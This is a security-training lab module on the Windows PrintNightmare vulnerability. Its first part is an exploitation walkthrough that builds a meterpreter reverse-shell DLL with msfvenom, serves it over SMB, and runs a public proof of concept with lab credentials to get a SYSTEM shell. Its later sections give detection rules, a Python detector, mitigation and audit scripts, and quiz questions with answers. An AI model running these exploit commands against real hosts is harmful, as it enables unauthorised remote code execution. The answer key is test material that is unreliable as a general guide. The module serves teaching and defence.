Print Nightmare

Exercise CVE-2021-34527 PrintNightmare

1. Introduction

PrintNightmare is a remote code execution and local privilege escalation vulnerability in the Windows Print Spooler service (spoolsv.exe), which runs as SYSTEM on every Windows host where it is enabled.

In this module, you will learn how to exploit the PrintNightmare vulnerability.

  • CVSS Base Score: 8.8

  • CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

1.1 How was It Discovered?

On June 29, 2021, details of a remotely exploitable vulnerability in the Microsoft Windows Print Spooler service were made public. The vulnerability was originally discovered by security researchers at Sangfor Technologies and responsibly disclosed to Microsoft. The issue affects all supported Windows versions.

1.2 What's up With the Double CVE Designation?

The patch released on June 8, 2021 for CVE-2021-1675 appeared to address the reported vulnerability, but not the underlying weakness that allowed it to exist. Researchers found a new exploitation technique that bypassed the patch, which led to a new CVE, CVE-2021-34527. The two vulnerabilities are similar but distinct.

1.3 Is There a Public Exploit Code Available?

There are multiple versions of functional exploit code available on the internet. Implementations have also been added to popular attack tools like Mimikatz and Metasploit.

1.4 So What Is the Actual Vulnerability?

The Windows Print Spooler service does not properly restrict who may call the RpcAddPrinterDriverEx API (the routine that underpins the Point and Print capability), so an authenticated user can hand the spooler a driver whose files it then loads into its own SYSTEM-privileged process. The access check on RpcAddPrinterDriverEx was addressed by the June patch. However, security researchers discovered an alternative function, RpcAsyncAddPrinterDriver, which newer exploit versions use to bypass the patch entirely and achieve both remote code execution and local privilege escalation. Ultimately, the vulnerability lets an attacker make a Windows host load a malicious DLL, including one fetched from an attacker-controlled SMB share, with SYSTEM privileges.

2. Practical Example

In the following steps, you will be using the Impacket framework and a published PrintNightmare proof-of-concept made by cube0x0, which is based on the C# version (SharpPrintNightmare) originally created by Zhiniang Peng (@edwardzpeng) and Xuefeng Li (@lxf02942370).

The Python PoC is already downloaded for you and available at /root/Desktop/workspace, but there are some prerequisites you will need to set up first.

2.1 Prepare the exploit

Install Impacket

pip install /root/Desktop/workspace/impacket-master

2.2 Compile and serve payload

As the vulnerability allows the attacker to load arbitrary dynamic link libraries (DLLs) that contain executable code, your next steps are to compile a DLL payload and serve it from your Kali host using SMB.

Using msfvenom, create a meterpreter reverse shell payload that will later be served via the SMB server. Note that the payload is set to windows/x64/meterpreter/reverse_tcp, which automatically sets the architecture to x64. This must match the target: on 64-bit Windows the spooler is a 64-bit process and loads the DLL into its own address space, so a 32-bit DLL would simply fail to load.

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.6.201 LPORT=4444 -f dll -o /root/Desktop/workspace/smb/shell.dll

Now that the payload has been created, you can use Impacket's smbserver.py script to start an SMB server in order to serve the payload. Open a new terminal window and run the following command:

smbserver.py share /root/Desktop/workspace/smb -smb2support

2.3 Exploit the vulnerability

Before running the exploitation script, it is necessary to start a payload handler via Metasploit.

Start Metasploit by running the msfconsole command in a terminal, and select the multi/handler module:

msf6 > use multi/handler

Now that the multi/handler module has been selected, the windows/x64/meterpreter/reverse_tcp payload must be selected to match the DLL compiled previously:

msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp

Furthermore, the localhost (LHOST) and local port (LPORT) must be configured before running the listener:

msf6 exploit(multi/handler) > set LHOST eth0

msf6 exploit(multi/handler) > set LPORT 4444 # Must match the payload options set in previous step

Run the listener by issuing the run command, which should start a reverse TCP handler.

Now that the listener is active and the SMB server is ready to serve the payload, the exploitation script CVE-2021-1675.py located in /root/Desktop/workspace is ready to be executed.

Target Windows Server: 192.168.0.4
Target user: bob
Target password: Student123

Attacker host: 192.168.6.201

Executing the exploit (the single quotes stop bash from interpreting the backslashes; the argument is the UNC path from which the target's spooler will fetch the DLL):

python3 CVE-2021-1675.py bob:Student123@192.168.0.4 '\\192.168.6.201\share\shell.dll'

Let's go back to our listener. A meterpreter session is successfully established:

shell

Let's grab the flag:

3. Detection

Because Microsoft's patch alone may not be a suitable mitigation for many organizations, the ability to detect PrintNightmare activity is crucial from a SOC's perspective. But are your systems configured to do so? First, ensure that logging is enabled for both of the following channels (the Operational channel is not enabled by default and must be turned on manually):

  • WinEventLog:Microsoft-Windows-PrintService/Admin

  • WinEventLog:Microsoft-Windows-PrintService/Operational

So now that the logging is enabled, what exactly should you be looking out for? Well, there are a few potentially malicious log artifacts you should be aware of. The following table lists some of the known ones.

Fortunately, because of the size of this vulnerability's attack surface, the industry responded quickly with detection, mitigation, and remediation guidance. Many SIEM vendors have already published alerts or rules for the activity described above. The following is an example from Splunk that detects spoolsv.exe writing a DLL to the \spool\drivers\x64\ directory:

Elastic has also reacted quickly with alerts of its own for PrintNightmare activity. The following EQL fragment detects suspicious modifications to a printer driver's Data File or Configuration File registry values: it matches the PoC's default driver name, or a Configuration File that points at a bare system DLL, which is what the public exploits write when they register their driver:

  (registry.path : "HKLM\\SYSTEM\\ControlSet*\\Control\\Print\\Environments\\Windows*\\Drivers\\Version-3\\mimikatz*\\Data File" or
  (registry.path : "HKLM\\SYSTEM\\ControlSet*\\Control\\Print\\Environments\\Windows*\\Drivers\\Version-3\\*\\Configuration File" and
   registry.data.strings : ("kernelbase.dll", "ntdll.dll", "kernel32.dll", "winhttp.dll", "user32.dll")))
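The indicators above expressed as runnable Python, as an added example that is not part of this module or of any vendor's rule set. It normalizes a few event shapes into one structure and applies the checks named in this section (spoolsv.exe writing a DLL under \spool\drivers\x64\, and the Data File / Configuration File registry logic from the EQL fragment), plus two PrintService event IDs from Microsoft's own guidance that the page does not list: 316 in the Operational log (driver added or updated) and 808 in the Admin log (plug-in module failed to load). It also generalizes the EQL slightly by flagging a Data File that points at a UNC path. The Event dataclass and its field names are this example's own, the sample events are constructed, and the 316/808 message wording is approximated from the real events rather than taken from a capture.

```python
"""PrintNightmare detection rules run over constructed sample events (added example)."""
import re
from dataclasses import dataclass

# Bare system DLL names the public PoCs put in a driver's Data/Configuration File
# (the same list as the Elastic EQL rule quoted above).
SYSTEM_DLLS = {"kernelbase.dll", "ntdll.dll", "kernel32.dll", "winhttp.dll", "user32.dll"}
# Any DLL under \spool\drivers\x64\ (the directory the Splunk rule watches).
DRIVER_STORE_RE = re.compile(r"\\spool\\drivers\\x64\\.*\.dll$", re.IGNORECASE)
# Registry path of a Version-3 driver's "Data File" / "Configuration File" value.
DRIVER_REG_RE = re.compile(
    r"^HKLM\\SYSTEM\\(?:CurrentControlSet|ControlSet\d+)\\Control\\Print\\Environments\\Windows[^\\]*"
    r"\\Drivers\\Version-3\\(?P<driver>[^\\]+)\\(?P<value>Data File|Configuration File)$", re.IGNORECASE)

@dataclass
class Event:
    """Normalized event; the field names are this example's own, not a vendor schema."""
    channel: str        # "Microsoft-Windows-PrintService/Operational", "Sysmon", ...
    event_id: int
    image: str = ""     # process behind a file/registry event
    message: str = ""   # free text of a PrintService event
    target: str = ""    # file path or registry path
    data: str = ""      # registry value data

def rule_driver_added(ev):
    """Operational 316 (driver added/updated): flag a UNC file, or a driver-store DLL listed
    together with bare system DLLs, which is how the PoC fills in the driver's file names."""
    if ev.channel != "Microsoft-Windows-PrintService/Operational" or ev.event_id != 316:
        return None
    parts = ev.message.split("Files:-", 1)
    m = re.match(r"\s*(.+?)\.?\s*(?:No user action|$)", parts[1], re.I | re.S) if len(parts) == 2 else None
    if not m:
        return None
    files = [f.strip().lower() for f in m.group(1).split(",")]
    unc = [f for f in files if f.startswith("\\\\")]
    store = [f for f in files if DRIVER_STORE_RE.search(f)]
    system = [f for f in files if f.rsplit("\\", 1)[-1] in SYSTEM_DLLS]
    if unc or (store and system):
        return "316 driver added with suspicious files: " + ", ".join(unc or store)
    return None

def rule_spoolsv_dll_write(ev):
    """File-create telemetry (Sysmon 11): spoolsv.exe writing a DLL into the driver store."""
    if (ev.channel == "Sysmon" and ev.event_id == 11
            and ev.image.lower().endswith("\\spoolsv.exe") and DRIVER_STORE_RE.search(ev.target)):
        return "spoolsv.exe wrote a DLL into the driver store: " + ev.target
    return None

def rule_driver_registry(ev):
    """Registry value set (Sysmon 13) on a driver's Data/Configuration File. Mirrors the EQL
    above and additionally flags a Data File that points at a UNC path."""
    if ev.channel != "Sysmon" or ev.event_id != 13:
        return None
    m = DRIVER_REG_RE.match(ev.target)
    if not m:
        return None
    driver, value, data = m["driver"], m["value"].lower(), ev.data.lower()
    if driver.lower().startswith("mimikatz"):
        return f"driver '{driver}' is named like a public attack tool"
    if value == "configuration file" and data in SYSTEM_DLLS:
        return f"Configuration File of driver '{driver}' set to system DLL {data}"
    if value == "data file" and data.startswith("\\\\"):
        return f"Data File of driver '{driver}' points at UNC path {ev.data}"
    return None

def rule_plugin_load_failure(ev):
    """Admin 808: the spooler failed to load a plug-in module; a failed attempt still leaves this."""
    if ev.channel == "Microsoft-Windows-PrintService/Admin" and ev.event_id == 808:
        return "808 plug-in module failed to load: " + ev.message
    return None

RULES = (rule_driver_added, rule_spoolsv_dll_write, rule_driver_registry, rule_plugin_load_failure)

def run(events):
    """Return (rule name, finding) for every event that trips a rule, in event order."""
    return [(rule.__name__, hit) for ev in events for rule in RULES if (hit := rule(ev))]

# Constructed sample events: the first four mirror the walkthrough above (shell.dll served from
# the attacker's share); the last two are a benign vendor driver install that must not fire.
STORE = "C:\\Windows\\System32\\spool\\DRIVERS\\x64\\3\\"
REG = "HKLM\\SYSTEM\\ControlSet001\\Control\\Print\\Environments\\Windows x64\\Drivers\\Version-3\\"
SPOOLSV = "C:\\Windows\\System32\\spoolsv.exe"
SAMPLE_EVENTS = [
    Event("Microsoft-Windows-PrintService/Operational", 316, message="Printer driver 1234 for Windows x64 "
          f"Version-3 was added or updated. Files:- {STORE}New\\shell.dll, kernelbase.dll, ntdll.dll. No user action is required."),
    Event("Sysmon", 11, image=SPOOLSV, target=STORE + "New\\shell.dll"),
    Event("Sysmon", 13, image=SPOOLSV, target=REG + "1234\\Configuration File", data="kernelbase.dll"),
    Event("Microsoft-Windows-PrintService/Admin", 808,
          message=f"The print spooler failed to load a plug-in module {STORE}New\\shell.dll, error code 0x45A."),
    Event("Microsoft-Windows-PrintService/Operational", 316, message="Printer driver Example PCL6 for Windows x64 "
          f"Version-3 was added or updated. Files:- {STORE}expcl6.dll, {STORE}expcl6ui.dll. No user action is required."),
    Event("Sysmon", 13, image=SPOOLSV, target=REG + "Example PCL6\\Configuration File", data=STORE + "expcl6ui.dll"),
]

if __name__ == "__main__":
    for name, finding in run(SAMPLE_EVENTS):
        print(f"[{name}] {finding}")
```

Run against the sample set, the four attack events each trip exactly one rule and the two benign ones trip none. The 316 rule deliberately requires a driver-store DLL together with bare system DLL names, since a legitimate vendor install also lands DLLs in the store; on a real estate you would still expect some tuning for driver-management products that call the same API.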

4. Mitigation

Microsoft has released updated versions of its patches and guidance as of July 13th. That said, if Microsoft's instructions are not carefully followed, hosts may still be left exposed to exploitation. The following information is taken from Microsoft's security update guide.

  • Install the official updates from Microsoft

  • Follow Microsoft's additional guidance on registry settings and/or GPO updates. Both of the following values under the key HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint must be 0 or not defined; any other value leaves the host exploitable even after the update is installed:

    • NoWarningNoElevationOnInstall = 0 (DWORD) or not defined (default setting)

    • UpdatePromptSettings = 0 (DWORD) or not defined (default setting)

Two workarounds can be implemented if updates cannot be installed:

Option 1 — Disable the Print Spooler service

If disabling the Print Spooler service is appropriate for your enterprise, use the following PowerShell commands:

Stop-Service -Name Spooler -Force
Set-Service -Name Spooler -StartupType Disabled

Workaround impact: This will disable the ability to print both locally and remotely.

Option 2 — Disable inbound remote printing through Group Policy

You can also configure the settings via Group Policy as follows:

Computer Configuration / Administrative Templates / Printers

Disable the “Allow Print Spooler to accept client connections:” policy to block remote attacks.

You must restart the Print Spooler service for the group policy to take effect.

Workaround impact: This policy will block the remote attack vector by preventing inbound remote printing operations. The system will no longer function as a print server, but local printing to a directly attached device will still be possible.
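As an added example (not from Microsoft or this module), a small Python audit that reads the PointAndPrint values listed above with winreg, reports anything that departs from the guidance, and classifies a host by which workaround is in force. Two identifiers in it come from Microsoft's published guidance rather than from this page: RestrictDriverInstallationToAdministrators, the DWORD under the same PointAndPrint key that the July 2021 update introduced (described in KB5005010) and whose default of 1 keeps driver installation admin-only, and RegisterSpoolerRemoteRpcEndPoint, the registry value under HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Printers behind the "Allow Print Spooler to accept client connections" policy (2 = disabled). The assess_point_and_print and spooler_exposure functions are pure so they can be exercised off-box; read_point_and_print only works on Windows.

```python
"""Audit Point and Print / spooler hardening against Microsoft's guidance (added example)."""
import sys

# Policy key under HKEY_LOCAL_MACHINE and the DWORDs Microsoft's guidance names.
POINT_AND_PRINT_KEY = r"SOFTWARE\Policies\Microsoft\Windows NT\Printers\PointAndPrint"
POINT_AND_PRINT_VALUES = ("NoWarningNoElevationOnInstall", "UpdatePromptSettings",
                          "RestrictDriverInstallationToAdministrators")

def assess_point_and_print(values):
    """values maps a PointAndPrint DWORD name to its int; an absent name means 'not defined'.
    Returns a list of (severity, message); an empty list means the key matches the guidance."""
    findings = []
    nw = values.get("NoWarningNoElevationOnInstall")
    if nw not in (None, 0):
        findings.append(("HIGH", f"NoWarningNoElevationOnInstall={nw}: Point and Print driver installs "
                                 "skip the warning and elevation prompt; set it to 0 or delete it"))
    up = values.get("UpdatePromptSettings")
    if up not in (None, 0):
        findings.append(("HIGH", f"UpdatePromptSettings={up}: driver update prompts are suppressed; "
                                 "set it to 0 or delete it"))
    # Introduced by the July 2021 update (see KB5005010); 1 is the post-update default.
    rd = values.get("RestrictDriverInstallationToAdministrators")
    if rd == 0:
        findings.append(("HIGH", "RestrictDriverInstallationToAdministrators=0: non-administrators may "
                                 "install print drivers, re-opening the Point and Print path"))
    elif rd is None:
        findings.append(("INFO", "RestrictDriverInstallationToAdministrators not defined: relies on the "
                                 "post-update default of 1; set it to 1 explicitly"))
    return findings

def spooler_exposure(start_type, remote_rpc_endpoint):
    """Combine the two workarounds. start_type is the Spooler service's StartType name;
    remote_rpc_endpoint is the RegisterSpoolerRemoteRpcEndPoint DWORD under
    HKLM\\SOFTWARE\\Policies\\Microsoft\\Windows NT\\Printers, the registry form of
    'Allow Print Spooler to accept client connections' (2 = disabled), or None if unset."""
    if start_type.lower() == "disabled":
        return "disabled"          # Option 1: no printing at all, and no spooler attack surface
    if remote_rpc_endpoint == 2:
        return "local-only"        # Option 2: remote vector closed, local escalation still relevant
    return "remote-exposed"        # default: spooler reachable over RPC from the network

def read_point_and_print():
    """Windows only: read the PointAndPrint DWORDs with winreg; a missing key or value is
    reported as 'not defined' (absent from the dict) rather than as an error."""
    import winreg
    values = {}
    try:
        with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, POINT_AND_PRINT_KEY) as key:
            for name in POINT_AND_PRINT_VALUES:
                try:
                    values[name] = winreg.QueryValueEx(key, name)[0]
                except FileNotFoundError:
                    pass
    except FileNotFoundError:
        pass
    return values

if __name__ == "__main__":
    if sys.platform != "win32":
        sys.exit("run this on the Windows host being audited")
    report = assess_point_and_print(read_point_and_print()) or [("OK", "PointAndPrint matches the guidance")]
    for severity, message in report:
        print(severity, message)
```

Note the asymmetry in how "not defined" is treated: for the two prompt-suppression values an absent entry is the safe default, while for RestrictDriverInstallationToAdministrators the safe behaviour only exists on hosts that have the July 2021 update, so the audit reports it as informational and recommends setting the value explicitly rather than trusting the default.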

5. Security Questions

  1. Which log channel must be enabled manually in order to obtain sufficient logs to detect potentially malicious activity related to the PrintNightmare vulnerability?

  2. Upon exploitation of the PrintNightmare vulnerability, attackers can execute code from an arbitrary .dll with which account privileges?

  3. A potential IoC of the PrintNightmare vulnerability is unusual .dll creations to which directory?

  4. Will patching your systems with the latest Windows update (KB5005010) fully remediate this vulnerability without any side effects?

  5. One option for mitigation is to disable the Print Spooler service. What is the potential impact of this workaround?

6. Answers

  1. Microsoft-Windows-PrintService/Operational

  2. SYSTEM

  3. \spool\drivers\x64\

  4. False. KB5005010 only restricts the installation of print drivers to administrators, which may not be suitable for many organizations.

  5. Inability to print both locally and remotely
